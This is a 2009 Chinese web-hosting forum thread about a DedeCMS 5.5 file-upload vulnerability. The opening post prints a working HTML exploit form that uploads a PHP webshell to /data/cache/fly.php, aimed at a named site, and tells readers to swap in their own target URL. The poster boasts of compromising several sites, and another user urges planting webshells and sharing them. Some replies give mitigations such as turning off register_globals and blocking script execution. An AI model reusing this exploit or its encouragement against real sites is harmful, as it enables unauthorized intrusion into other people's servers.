全球主机交流论坛

标题: dede5.5爆漏洞了!!我站被日了!(附带利用方法) [打印本页]

作者: 网络寄生虫 时间: 2009-10-27 00:20
标题: dede5.5爆漏洞了!!我站被日了!(附带利用方法)
http://www.sebug.net/vulndb/12518/

影响版本:
Dedecms 5.5漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php，其变量$cfg_basedir没有正确初始化，导致可以饶过身份认证和系统变量初始化文件，导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考
by：Flyh4t
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  <input type='hidden' name='activepath' value='/data/cache/' />
  <input type='hidden' name='cfg_basedir' value='../../' />
  <input type='hidden' name='cfg_imgtype' value='php' />
  <input type='hidden' name='cfg_not_allowall' value='txt' />
  <input type='hidden' name='cfg_softtype' value='php' />
  <input type='hidden' name='cfg_mediatype' value='php' />
  <input type='hidden' name='f' value='form1.enclosure' />
  <input type='hidden' name='job' value='upload' />
  <input type='hidden' name='newname' value='fly.php' />
  Select U Shell <input type='file' name='uploadfile' size='25' />
  <input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

作者: 网络寄生虫 时间: 2009-10-27 00:21
把以上代码改成 html url:改为目标站!

作者: gdtv 时间: 2009-10-27 00:22

作者: 遍地阳光 时间: 2009-10-27 00:22
看不懂。

作者: 遍地阳光 时间: 2009-10-27 00:23
我的还是5.3

作者: 网络寄生虫 时间: 2009-10-27 00:25
傻瓜利用方法!!

我很坏居然成功了2个网站

作者: 网络寄生虫 时间: 2009-10-27 00:28
今天才爆的

作者: junhan 时间: 2009-10-27 00:33
我站register_globals是关闭的`

作者: 啊猪同学 时间: 2009-10-27 00:36
靠。。我马上去更新。。

作者: 遍地阳光 时间: 2009-10-27 00:36
标题: 回复 7# 的帖子
上传的文件跑哪里了》？

作者: 网络寄生虫 时间: 2009-10-27 00:39
data/cache/fly.php

作者: 啊猪同学 时间: 2009-10-27 00:39
没补丁下载？我日

作者: 网络寄生虫 时间: 2009-10-27 00:39
标题: 回复 9# 的帖子
你要感谢我

另外我很坏

已经成功了5个站点了!

作者: 遍地阳光 时间: 2009-10-27 00:40
标题: 回复 11# 的帖子
在ftp里我也找不到。

作者: 网络寄生虫 时间: 2009-10-27 00:40

原帖由 啊猪同学 于 2009-10-27 00:39 发表
没补丁下载？我日

暂时没补丁我的办法是把data目录禁止执行脚本权限

作者: 网络寄生虫 时间: 2009-10-27 00:41
把PHP那个改成 off就好了

作者: 网络寄生虫 时间: 2009-10-27 00:42
标题: 回复 14# 的帖子
把你的演示站发来我试试

作者: 啊猪同学 时间: 2009-10-27 00:43
后台有更新，，但是显示有个目录不能写。我晕死了。我win系统来的。怎么不能写

作者: 啊猪同学 时间: 2009-10-27 00:43
Error page: /dede/update_guide.php?dopost=down&curfile=11
Error infos: DedeCms错误警告：连接数据库失败，可能数据库密码不对或数据库服务器出错！

作者: 遍地阳光 时间: 2009-10-27 00:45
标题: 回复 17# 的帖子
不麻烦你了。

作者: 啊猪同学 时间: 2009-10-27 00:45
我先吧select_soft_post.php改名先吧

作者: 网络寄生虫 时间: 2009-10-27 00:47

作者: 啊猪同学 时间: 2009-10-27 00:48
标题: 回复 22# 的帖子
nnd，，等补丁下载，，，，我坚决不在后台更新补丁，，，容易出问题。

作者: 网络寄生虫 时间: 2009-10-27 00:49

现在没有补丁吧我站现在只有后台跟验证码目录能执行脚本很安全了

作者: 网络寄生虫 时间: 2009-10-27 00:49
你把脚本关了就很安全了

作者: 遍地阳光 时间: 2009-10-27 00:50
标题: 回复 21# 的帖子
我在这个文件里找不到register_globals=on这句话啊。

作者: 网络寄生虫 时间: 2009-10-27 00:50
标题: 回复 20# 的帖子

发出来我看看!

作者: 网络寄生虫 时间: 2009-10-27 00:50
在php.ini里面呢

作者: 遍地阳光 时间: 2009-10-27 00:52
标题: 回复 27# 的帖子
发出来站就没了。

作者: 啊猪同学 时间: 2009-10-27 00:54
标题: 回复 24# 的帖子
有补丁了。。后台也显示警告了。。你自己看看，，可是后台的我更新不了。还是等补丁包出来

作者: 网络寄生虫 时间: 2009-10-27 00:58
标题: 回复 29# 的帖子

知道咱论坛有谁用5.5么

作者: 490775 时间: 2009-10-27 00:58
提示: 作者被禁止或删除内容自动屏蔽

作者: 490775 时间: 2009-10-27 01:02
提示: 作者被禁止或删除内容自动屏蔽

作者: 遍地阳光 时间: 2009-10-27 01:02
标题: 回复 31# 的帖子
我用5.5，告诉你你也入侵不了鸟，

实际上我也没有找到register_globals=on这句话，
不过，我把文件名字改掉了，

睡觉先。

作者: 网络寄生虫 时间: 2009-10-27 01:04

我不告诉你你就倒霉了

作者: 网络寄生虫 时间: 2009-10-27 01:07
标题: 回复 33# 的帖子
变量没开 off

作者: cpuer 时间: 2009-10-27 01:09
dedecms漏洞真多。

作者: zyypp 时间: 2009-10-27 01:31
哈哈这都被你第一时间发现啦呵呵赶快去挂几个 webshell 先吧然后把地址告诉我们让我们去玩玩嘿嘿

作者: 网络寄生虫 时间: 2009-10-27 01:36
标题: 回复 38# 的帖子
因为我站第一个被干掉了

作者: zyypp 时间: 2009-10-27 01:43
标题: 回复 39# 的帖子
O(∩_∩)O哈哈~
为你的站默哀下
好了偶去 (～ o ～)~zZ 啦
(*^__^*) 嘻嘻……

作者: toapple 时间: 2009-10-27 01:51
有什么用？破坏数据库？

作者: 网络寄生虫 时间: 2009-10-27 01:59
直接上传PHP木马

作者: skyover 时间: 2009-10-27 08:17
偶是5.5，但偶的站register_global 没有开。

作者: cpuer 时间: 2009-10-27 08:53
标题: 回复 43# 的帖子
register_global 很多虚拟主机都不会开这个的。

作者: njkml 时间: 2009-10-27 08:59
register_globals=on 默认关闭的，楼主能拿下这么多，运气不是一般的好

作者: skyover 时间: 2009-10-27 09:00
我拿下一个站，但不知道有什么用处。

作者: cpuer 时间: 2009-10-27 09:01
标题: 回复 45# 的帖子
呵呵，肯定Google搜索了上百个dedecms站点。

作者: qwe123 时间: 2009-10-27 09:25
拿下一个站就可以用php做个小代理，该干嘛干嘛啦

作者: cpuer 时间: 2009-10-27 09:40
标题: 回复 48# 的帖子
小代理？

作者: fanslive 时间: 2009-10-27 10:34
Register_Globals：Off

作者: cpuer 时间: 2009-10-27 10:45
标题: 回复 50# 的帖子
这个最好off掉，一般的程序都不要求on。

作者: gg8280525 时间: 2009-11-4 18:15
占位

欢迎光临全球主机交流论坛 (https://443502.xyz/)